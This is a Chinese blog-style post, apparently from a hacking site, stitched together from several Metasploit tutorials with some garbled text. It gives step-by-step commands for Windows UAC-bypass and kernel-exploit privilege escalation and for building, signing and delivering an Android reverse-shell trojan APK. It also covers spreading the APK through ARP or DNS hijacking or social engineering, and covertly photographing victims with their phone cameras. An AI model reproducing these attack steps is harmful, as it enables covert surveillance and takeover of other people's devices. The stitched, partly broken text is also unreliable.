置顶

渗透工具msf安装,msf外网渗透

作者:hacker | 分类:网站入侵 | 浏览:110 | 日期:2022年09月06日

目录:

用termux安装metasploit的问题,挺急的,求大神解决,在线等!!

初次使用简书,不知道可以编辑md文档,所以排版有点.....

termux可以利用proot出一个linux,proot是无需root的。但是随之而来很多问题

1.kali大部分工具不知道如何安装比如msf,以为apt install metasploit就行了

2.不会使用pkg,termux中pkg和apt其实差不多.........

3.没有图形化界面

本文就是希望更多人可以使用termux,发展termux。以下是正文(错误难免,还望指出)

好多人一直苦于安装msf,rsf,python的numpy,matplotlib,pillow(这个库我已经安装成功了)等库。还有就是终端不够漂亮。这篇文章就是……如题*^o^*手动滑稽

如果没有下载termux,这是官网地址点这里

推荐去f-droid下载最新版(酷安的一直没有更新)

ps.之一次进更好使用流量

另外我在github上面有关于termux的一个项目漂亮的妹子看过来欢迎fork and star。

ps.这个项目是帮助你们安装所有我安装了的东西,如果不喜欢,可以看下文,下文也包含了那些东西,只不过我那个脚本是自动化的。

MSF内网渗透系列2-权限提升

在上篇文章中,通过win7运行msf.exe,kali接收到一个session,但这个session权限只是普通权限,无法做更多的操作。

权限提升

1.提高程序运行级别

2.UAC绕过

3.利用提权漏洞进行提权

提高程序运行级别

msf模块exploit/windows/local/ask

但会触发UAC,只有当用户同意是才能获得更高权限

可以看到session 5只是普通权限,这时候利用ask模块进行提权,该模块需要设置要用来提权的session,以及启动程序的名称

ask模块设置完成后,就可以使用了,运行exploit,回到win7,可以看见弹出一个execl.exe程序框,如果你点击是,则kali会获得一个新的session,如果点击否,则kali会得到失败信息。

Win7 截图:

win7 点击 否,kali返回信息:

win7 点击 是,kali获取到新的session

使用background退出这个meterpreter

使用sessions,查看session

使用sessions -i 6,进入新获取的session

使用getuid查看该session权限

发现还是普通权限

这时候使用getsystem,获得系统权限

再使用getuid查看

UAC绕过

msf模块

exploit/windows/local/bypassuac

exploit/windows/local/bypassuac_injection

exploit/windows/local/bypassuac_vbs

这里使用之一个模块进行绕过UAC提权

利用提权漏洞进行提权

exploit/windows/local/ms14_058_track_popup_menu

等等

这里使用

exploit/windows/local/ms16_014_wmi_recv_notif

这个模块,同样使用info和show options查看信息,只需要设置一个session就可以使用

攻击成功会直接返回一个shell,使用whoami查看权限

成功提权

BackTrack5( *** 5)怎么安装? 还有应该怎么启动MSF呢.... 更好是视频

首先bt5

的安装教程网上

一大堆,不论是

虚拟机安装还是硬盘安装,这些教程肯定比我给你手打的要详细!

建议你

上网上找两个

,仔细读一下,

如果有问题,你在追问!

还有

启动msf、

可以命令启动,在终端里

sudo

软件名

也可以在左上角的软件菜单里慢慢找,ps:那里

工具太多了,估计不知道的你需要找一阵。

msf怎么远程监控安卓手机

既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP

本机IP:192.168.1.6

在到终端输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R /root/apk.apk

以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示

msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径

这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。现在我们在来启动MSF工具

输入命令:msfconsole

然后输入:

1. use exploit/multi/handler 加载模块

2. set payload android/meterpreter/reverse_tcp  选择Payload

3.show options 查看参数设置

我们看见payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置

1.set LHOST 192.168.1.6 这里的地址设置成我们刚才生成木马的IP地址

2.set LPORT 5555 这里的端口设置成刚才我们生成木马所监听的端口

3.exploit 开始执行漏洞 开始监听...

OK,一切准备工作准备就绪。。。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件

还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试

安装完成后 会在桌面上生成一个MainActivity的程序图标 这个就是我们刚才生成的木马 当我们点击了这个图标 手机会没有任何反应 其实木马已经开始运行起来了

我们可以在我们的MSF里看见有一个会话连接了

这样对方的手机就就被我们控制了,查看手机系统信息,输入命令 sysinfo

webcam_list查看手机摄影头有几个 这里显示两项 分别表示有前后两个摄像头

webcam_snap 隐秘拍照功能

后边跟上参数-i 指定使用那个摄像头拍照

可以看见我们分别对前后摄像头都拍了照 保存到了桌面上

还可以输入命令 webcam_stream 开启摄像头

如何使用Metasploit对安卓手机进行控制

文章内容可能具有一定攻击性,本文仅供技术交流,如有非法使用后果自负。

在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。

创建负载

我们需要两台虚拟机:Kali Linux和安卓模拟器。

打开vm启动Kali linux。接着打开终端,使用msfvenom *** android利用程序。

Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。

一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。

```

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk

```

p 设置要使用的payload

LHOST 设置用来接收反弹连接的主机

LPORT 设置用来接收反弹连接的端口

R 设置文件格式

Location 要保存的文件位置

这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。

我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。

我们可以使用如下工具进行手动签名:

l Keytool (已安装)

l jar signer (已安装)

l zipalign (需要安装)

执行下列命令签名。首先使用密钥工具创建密钥库。

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

`

然后使用JARsigner签名APK

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`

再用JARsigner验证签名

jarsigner -verify -verbose -certs APPNAME.apk

`

Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。

zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

现在我们有了一个带有签名的APK,它可以安装在任何设备上。

使用Metasploit进行测试

接下来启动metasploit的监听器。执行msfconsole打开控制台。

use exploit/multi/handler

Set PAYLOAD android/meterpreter/reverse_tcp

SET LHOST 192.168.152.128

SET LPORT 4444

Exploit

是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。

这是我们切换到安卓模拟器。

如何在ubuntu中安装metasploit环境

安装metasploit

1、curl msfinstall

2、chmod 755 msfinstall

3、./msfinstall

依次执行上面渗透工具msf安装的三条命令即可安装成功

2

安装postgresql数据库

安装数据库的时候会自动创建系统用户postgres,数据库用户postgres,数据库postgres

1、apt-get install postgresql //安装postgresql数据库

2、su - postgres //切换到postgres用户

3、psql //登陆postgresql数据库渗透工具msf安装,首次登陆没有密码

4、\password postgres //修改数据库用户postgres的密码

3

msf使用数据库

1、msfconsole //启动msf

2、db_connect postgres:hehehe@127.0.0.1/test //用户名,密码,地址,自己随意编造的名字。

3、db_status //查看数据库连接状态

4

安装完成,可以开始渗透工具msf安装你的metasploit渗透之路了!!!

5

参考渗透工具msf安装:如果希望添加新的用户

建立一个普通用户

useradd -m feng //feng是我的用户名,你可以改成任意用户名。

passwd feng //设置一下新建的用户名的密码。

usermod -a -G sudo feng //修改用户的附加组为超级管理组。

chsh -s /bin/bash feng //设置用户使用的命令控制台。

6

sure : if you want to download it from "http" with thunder and so on , please open

then move to the bottom , get it !!

发表评论

访客 游客 2022-09-07 · 回复该评论
加载模块2. set payload android/meterpreter/reverse_tcp  选择Payload3.show options 查看参数设置我们看见payload里边有两个参数要设置 LHOST和LP

访客 游客 2022-09-06 · 回复该评论
cal/bypassuac exploit/windows/local/bypassuac_injection exploit/windows/local/

访客 游客 2022-09-06 · 回复该评论
文件弄我自己的手机上做测试安装完成后 会在桌面上生成一个MainActivity的程序图标 这个就是我们刚才生成的木马 当我们点击了这个图标 手机会没有任何反应 其实木马已经开始运行起来了我们可以在我们的MSF里看见有一个会话连接了这样对方的手机就就被我们控制了,查看手机系统信息,输入命

取消
微信二维码
支付宝二维码